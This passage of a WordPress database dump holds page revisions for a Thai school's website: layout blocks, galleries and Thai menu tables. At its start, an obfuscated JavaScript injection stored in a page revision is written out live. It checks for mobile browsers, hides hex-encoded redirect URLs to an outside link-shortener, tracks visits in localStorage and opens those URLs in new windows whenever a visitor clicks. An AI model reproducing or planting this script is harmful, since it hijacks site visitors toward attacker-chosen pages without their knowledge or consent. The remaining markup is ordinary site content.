g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:43:35','2024-07-27 04:43:35','',14,'http://pakhaeng.ssk.in.th/?p=102',0,'revision','',0),
(103,1,'2024-07-27 11:44:55','2024-07-27 04:44:55','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 